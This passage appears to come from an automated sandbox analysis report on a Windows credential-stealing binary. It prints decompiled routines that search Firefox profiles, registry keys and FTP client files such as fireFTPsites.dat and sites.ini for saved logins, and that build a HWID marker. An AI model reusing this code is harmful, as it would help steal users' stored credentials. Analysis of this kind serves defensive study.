Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

fireFTPsites.dat, xrefs: 00409A51
Software\Mozilla, xrefs: 00409A89, 00409AA6
Firefox, xrefs: 00409A84, 00409AA1
\Mozilla\Firefox\, xrefs: 00409A40, 00409A7F, 00409A9C

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
API String ID: 3007406096-624000163
Opcode ID: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
Instruction ID: 60e21d86f469014f8f7ff040f91813a7819b2797126ab95d7269fae31e95df33
Opcode Fuzzy Hash: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
Instruction Fuzzy Hash: 24017570641608FEEF117FA1CC47FC93A699F84748F104037B608B51E2EABD59E0966C

Uniqueness

Uniqueness Score: -1.00%

Function 0040988E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040988E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
				void* _v8;
				char* _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t37;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t59;

				_t59 = __ecx;
				if(StrStrIA(_a12, _a16) != 0) {
					_t48 = E00401C8E(_a8, _a12, "PathToExe", 0); // executed
					_t49 = _t48;
					_t61 = _t49;
					if(_t49 != 0) {
						_push(_t49);
						_t51 = E0040234A(_t61, _t49);
						_t62 = _t51;
						if(_t51 != 0) {
							_v28 = _t51;
							_t54 = E00401DCE(_t62, 0x1a);
							if(E00401DCE(_t62, 0x1a) != 0) {
								E00409713(_a4, E00401D69(_t54, _a20), _v28);
								E004017D5(_t56);
							}
							E004017D5(_v28);
						}
						E004017D5();
					}
				}
				_v12 = E004017EC(0x800);
				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				if(_t37 == 0) {
					_v20 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v24 = E00401D69(E00401D15(_a12, "\\"), _v12);
						E0040988E(_t59, _a4, _a8, _v24, _a16, _a20);
						E004017D5(_v24);
						_v20 = _v20 + 1;
					}
					RegCloseKey(_v8);
				}
				return E004017D5(_v12);
			}

0x0040988e
0x004098a1
0x004098b0
0x004098b5
0x004098b5
0x004098b7
0x004098b9
0x004098c0
0x004098c0
0x004098c2
0x004098c4
0x004098ce
0x004098d0
0x004098e3
0x004098e8
0x004098e8
0x004098f0
0x004098f0
0x004098f5
0x004098f5
0x004098b7
0x00409904
0x00409911
0x00409918
0x0040991a
0x00409921
0x00409921
0x00409944
0x00000000
0x00000000
0x0040995e
0x00409970
0x00409978
0x0040997d
0x0040997d
0x00409985
0x00409985
0x00409993

APIs

StrStrIA.SHLWAPI(?,?), ref: 0040989A
RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
RegEnumKeyExA.ADVAPI32 ref: 0040993D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

PathToExe, xrefs: 004098A5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
String ID: PathToExe
API String ID: 3012581338-1982016430
Opcode ID: 0a33e97ccaf1ba2b7b7e5bf0642aba39ef90e638a46a30579a0fb42161cfd6fc
Instruction ID: 9921fcbb10fb3e88fa5f2a06c9976cc3b0665bb7c53d4c2d3e03b44b5fdf6235
Opcode Fuzzy Hash: 0a33e97ccaf1ba2b7b7e5bf0642aba39ef90e638a46a30579a0fb42161cfd6fc
Instruction Fuzzy Hash: 65310C7291010EBBDF116FE2CC42FEE7A75AF04304F10403AB610B51F2DA799D61AB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402725, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00402725(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				char _v277;
				void* _t23;
				void* _t24;
				long _t27;
				void* _t35;
				void* _t36;
				void** _t41;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t53;

				_t53 = __edx;
				_t23 = E00401C8E( *0x4140fe, "Software\\WinRAR", _a4, _a8); // executed
				_t24 = _t23;
				if(_t24 != 0) {
					return _t24;
				}
				_t51 = 0;
				_t27 = GetTempPathA(0x104,  &_v277);
				if(_t27 == 0 || _t27 > 0x104) {
					L12:
					return _t51;
				} else {
					E00401000( &_v8, _t53,  &_v8);
					if(E004024D7( &_v277) != 0) {
						_t35 = E00401D15( &_v277, _a4);
					} else {
						_t35 = E00401D69(E00401D15( &_v277, "\\"), _a4);
					}
					_push(_t35);
					_t36 = E004011D5(_t35, _t53, _t35, _v8); // executed
					_t37 = _t36;
					if(_t36 != 0) {
						_v12 = E0040106A(_t37, _t53, _v8);
						if(_v12 != 0) {
							_t41 =  &_v16;
							_push(_t41);
							_push(_v8);
							L00410DBE();
							if(_t41 >= 0) {
								_t43 = GlobalLock(_v16);
								if(_t43 != 0) {
									_t51 = E004017EC(_v12);
									_t45 = _t43;
									E00401823(_t45, _t51, _v12);
									GlobalUnlock(_v16);
									_push(_v12);
									_pop( *__eax);
								}
							}
						}
					}
					E00401019(E004017D5(), _t53, _v8);
					goto L12;
				}
			}

0x00402725
0x00402740
0x00402745
0x00402747
0x00402829
0x00402829
0x0040274d
0x00402760
0x00402762
0x00402825
0x00000000
0x00402773
0x00402777
0x0040278a
0x004027b2
0x0040278c
0x004027a1
0x004027a1
0x004027b7
0x004027bc
0x004027c1
0x004027c3
0x004027cd
0x004027d4
0x004027d6
0x004027d9
0x004027da
0x004027dd
0x004027e4
0x004027ee
0x004027f0
0x004027fb
0x004027fd
0x00402803
0x0040280b
0x00402813
0x00402816
0x00402816
0x004027f0
0x004027e4
0x004027d4
0x00402820
0x00000000
0x00402820

APIs

GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
GlobalLock.KERNEL32 ref: 004027E9
GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1

Strings

Software\WinRAR, xrefs: 00402735

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Globallstrlen$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
String ID: Software\WinRAR
API String ID: 2423343858-224198155
Opcode ID: 3391d8feb5a8d5462d63242a6ec9611df74648ce9e8382b5ac25b7fc276f6611
Instruction ID: 7478491bfa33174de51c22f170f017b73afdc2e34cee783fbd344f0ac75d9f77
Opcode Fuzzy Hash: 3391d8feb5a8d5462d63242a6ec9611df74648ce9e8382b5ac25b7fc276f6611
Instruction Fuzzy Hash: 3C212F76A00109BADF05BBE1CD4A9DDBA7DEF44358F108177B600B20E1E6BD8A949B58

Uniqueness

Uniqueness Score: -1.00%

Function 004045ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004045ED(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				int _v2072;
				char _v2076;
				long _t31;
				long _t32;
				intOrPtr _t44;

				_t31 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t32 = _t31;
				if(_t32 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						if(_v2072 == 1 || _v2072 == 7) {
							if(StrStrIA( &_v2064, "Line") == 0) {
								L13:
								_v12 = _v12 + 1;
								continue;
							}
							_t44 = E00401C8E( *0x4140fe, _a8,  &_v2064,  &_v2076);
							if(_t44 == 0) {
								goto L13;
							}
							_v2068 = _t44;
							E00401486(_a4, 0xbeef0001);
							if(_v2072 != 1) {
								E00401486(_a4, 1);
							} else {
								E00401486(_a4, 0);
							}
							E004014BC(_a4, _v2068, _v2076);
							E004017D5(_v2068);
							goto L13;
						} else {
							_v12 = _v12 + 1;
							continue;
						}
					}
					return RegCloseKey(_v8);
				}
				return _t32;
			}

0x00404603
0x00404608
0x0040460a
0x00404610
0x00404617
0x00404617
0x00404643
0x00000000
0x00000000
0x00404651
0x00404674
0x004046e7
0x004046e7
0x00000000
0x004046e7
0x00404692
0x00404694
0x00000000
0x00000000
0x00404696
0x004046a4
0x004046b0
0x004046c3
0x004046b2
0x004046b7
0x004046b7
0x004046d7
0x004046e2
0x00000000
0x0040465c
0x0040465c
0x00000000
0x0040465c
0x00404651
0x00000000
0x004046f2
0x004046f8

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404603
RegEnumValueA.ADVAPI32 ref: 0040463C
StrStrIA.SHLWAPI(?,Line), ref: 0040466D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 004046F2

Strings

Line, xrefs: 00404661

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: Line
API String ID: 4012628704-1898322888
Opcode ID: 4bc0c0cf891e73b42a3f2e34f116057a73adb986859bb762e80a9a6402df02bf
Instruction ID: 7fcf9f9aae3f6b2ea9e0e0dabca749cb460151442f66bdead352d5342de98d71
Opcode Fuzzy Hash: 4bc0c0cf891e73b42a3f2e34f116057a73adb986859bb762e80a9a6402df02bf
Instruction Fuzzy Hash: EF211C7180011CBADF219B91CC41BED7BB9BF41304F0484B6B644B11A1EB7E9F959F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3E5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3E5(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				int _v2072;
				char _v2076;
				long _t27;
				long _t28;
				char* _t37;
				void* _t43;

				_t43 = __ecx;
				_t27 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t28 = _t27;
				if(_t28 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0,  &_v2072, 0, 0) != 0) {
							break;
						}
						__eflags = _v2072 - 1;
						if(_v2072 == 1) {
							_t37 = E00401C8E(_a4, _a8,  &_v2064,  &_v2076);
							__eflags = _t37;
							if(_t37 == 0) {
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							_v2068 = _t37;
							__eflags = StrStrIA(_v2068, ".wjf");
							if(__eflags != 0) {
								E0040E163(_t43, __eflags, _a12, _v2068);
							}
							E004017D5(_v2068);
							goto L10;
						}
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t28;
			}

0x0040e3e5
0x0040e3f8
0x0040e3fd
0x0040e3ff
0x0040e405
0x0040e40c
0x0040e40c
0x0040e438
0x00000000
0x00000000
0x0040e43c
0x0040e443
0x0040e463
0x0040e463
0x0040e465
0x0040e49a
0x0040e49a
0x00000000
0x0040e49a
0x0040e467
0x0040e47d
0x0040e47f
0x0040e48a
0x0040e48a
0x0040e495
0x00000000
0x0040e495
0x0040e445
0x0040e445
0x00000000
0x0040e4a5
0x0040e4ab

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E3F8
RegEnumValueA.ADVAPI32 ref: 0040E431
StrStrIA.SHLWAPI(?,.wjf,00000000,000007FF,?,?), ref: 0040E478
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E4A5

Strings

.wjf, xrefs: 0040E46D

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: c83530f97f56f3b4375d12b3fb4e0442e6c1c0cb1499dd27e9528eb1518b1955
Instruction ID: 2985ecba4934f64bc87a956b145e7b99f857eac3f65c13796da90851c2a9d639
Opcode Fuzzy Hash: c83530f97f56f3b4375d12b3fb4e0442e6c1c0cb1499dd27e9528eb1518b1955
Instruction Fuzzy Hash: 0211FC7291010CAADF119B92CC41BEDBBB9BF00304F0484B6A514B41A1DB799EA6AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040434C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040434C(void* __ecx, void* __edx) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed short _v14;
				signed short _v16;
				char _v20;
				char _v120;
				char _v124;
				void* _t19;
				char* _t21;

				_t19 = E00402725(__ecx, __edx, "HWID",  &_v124); // executed
				_push(_t19);
				if(_t19 == 0 || _v124 <= 0x14) {
					_t21 =  &_v20;
					_push(_t21);
					L00410DC4();
					if(_t21 >= 0) {
						wsprintfA( &_v120, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v20, _v16 & 0x0000ffff, _v14 & 0x0000ffff, _v12 & 0x000000ff, _v11 & 0x000000ff, _v10 & 0x000000ff, _v9 & 0x000000ff, _v8 & 0x000000ff, _v7 & 0x000000ff, _v6 & 0x000000ff, _v5 & 0x000000ff);
						E0040260B("HWID",  &_v120, lstrlenA( &_v120)); // executed
					}
				}
				return E004017D5();
			}

0x0040435b
0x00404360
0x00404363
0x0040436b
0x0040436e
0x0040436f
0x00404376
0x004043b6
0x004043d1
0x004043d1
0x00404376
0x004043dc

APIs

Part of subcall function 00402725: GetTempPathA.KERNEL32(00000104,?,Software\WinRAR,?,?,?,?,0041049F,Client Hash,?,?,00000000), ref: 0040275B
Part of subcall function 00402725: GetHGlobalFromStream.OLE32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000104,?,Software\WinRAR,?,?), ref: 004027DD
Part of subcall function 00402725: GlobalLock.KERNEL32 ref: 004027E9
Part of subcall function 00402725: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 0040280B

CoCreateGuid.OLE32(?,00000000,HWID,?), ref: 0040436F
wsprintfA.USER32 ref: 004043B6
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,HWID,?), ref: 004043C2

Strings

HWID, xrefs: 00404356, 004043CC
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 004043AD

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1852535927-1100116640
Opcode ID: 7c1486808c2ee149e2a97c7e0c132aac0d5a753c27695d7137dc8f06e4236a6f
Instruction ID: 0e75cfa17dfb2f7b8333cb936f596bb44a555b5fa009e7f621812bee52e14eac
Opcode Fuzzy Hash: 7c1486808c2ee149e2a97c7e0c132aac0d5a753c27695d7137dc8f06e4236a6f
Instruction Fuzzy Hash: 9C113CA690419D7DCB61E2F64D06DFFBAFC590C605B1400A7B6A0E20C2E67D97409B38

Uniqueness

Uniqueness Score: -1.00%

Function 00409996, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409996(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x24, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409996
0x00409996
0x00409996
0x004099ab
0x004099ae
0x004099c4
0x004099e1
0x004099fd
0x00409a09
0x00409a1a

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004099C4

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A09

Strings

Software\Mozilla, xrefs: 004099D3, 004099F0
Firefox, xrefs: 004099CE, 004099EB
\Mozilla\Firefox\, xrefs: 004099C9, 004099E6

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
Instruction ID: ee68b02c4fe34adabb2d5b7da2459322c65d04647a6db10db078e7f2ecd853e2
Opcode Fuzzy Hash: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
Instruction Fuzzy Hash: 96F01231540608FEDF11BF91CC47FC93B659B84748F108076B609B51E2E7B95AE09A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409BE1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BE1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x28, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409be1
0x00409be1
0x00409be1
0x00409bf6
0x00409bf9
0x00409c0f
0x00409c2c
0x00409c48
0x00409c54
0x00409c65

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C0F

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409C54

Strings

Software\Mozilla, xrefs: 00409C1E, 00409C3B
Mozilla, xrefs: 00409C19, 00409C36
\Mozilla\Profiles\, xrefs: 00409C14, 00409C31

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
Instruction ID: bbdd13b51472c6f4fc299ffa726447a69ce41118111f745e7b4f7d92f38d9e6c
Opcode Fuzzy Hash: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
Instruction Fuzzy Hash: 5AF0627055060CFADB51BFA1CD03FC93A659B94784F108036B604741F2DAB94AD09B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CABE, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040CABE(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t10;
				void* _t12;
				char* _t20;
				void* _t29;
				char* _t30;

				_t29 = __edx;
				_v8 = E0040150D(_a4, 0x42, 0);
				_t30 =  *0x414082; // 0x0
				if( *_t30 == 0) {
					L5:
					_t10 = E00401DCE(_t34, 0x23);
					_t35 = _t10;
					if(_t10 != 0) {
						E00404131(_a4, E00401D69(_t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
						E004017D5(_t17);
					}
					_t12 = E00401DCE(_t35, 0x23);
					_t36 = _t12;
					if(_t12 != 0) {
						E00404131(_a4, E00401D69(_t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
						E004017D5(_t14);
					}
					return E00401553(_t29, _t36, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t20 = StrStrIA(_t30, "3D-FTP");
					_t32 = _t20;
					if(_t20 != 0) {
						_t24 = E0040234A(_t32, _t30);
						if(E0040234A(_t32, _t30) != 0) {
							E00404131(_a4, _t24, "sites.ini", 0xbeef0000);
							E004017D5(_t24);
						}
					}
					asm("cld");
					asm("repne scasb");
					_t34 =  *_t30;
				} while ( *_t30 != 0);
				goto L5;
			}

0x0040cabe
0x0040cad1
0x0040cad4
0x0040cadd
0x0040cb1f
0x0040cb26
0x0040cb26
0x0040cb28
0x0040cb44
0x0040cb49
0x0040cb49
0x0040cb55
0x0040cb55
0x0040cb57
0x0040cb73
0x0040cb78
0x0040cb78
0x0040cb8a
0x00000000
0x00000000
0x00000000
0x0040cadf
0x0040cadf
0x0040cae5
0x0040caea
0x0040caec
0x0040caf4
0x0040caf6
0x0040cb07
0x0040cb0c
0x0040cb0c
0x0040caf6
0x0040cb11
0x0040cb19
0x0040cb1b
0x0040cb1b
0x00000000

APIs

StrStrIA.SHLWAPI(00000000,3D-FTP), ref: 0040CAE5

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

\3D-FTP, xrefs: 0040CB2A
sites.ini, xrefs: 0040CAFE, 0040CB3B, 0040CB6A
3D-FTP, xrefs: 0040CADF
\SiteDesigner, xrefs: 0040CB59

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
Instruction ID: c21e1b23b53f1c1b31708c1f6647b193aba12693f6123f211595877f46f97cb5
Opcode Fuzzy Hash: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
Instruction Fuzzy Hash: 2711C1B0A40205B9EB1137769C47FAF397E4F80754F24013B7951B55E2DA7CAE8086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB27, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

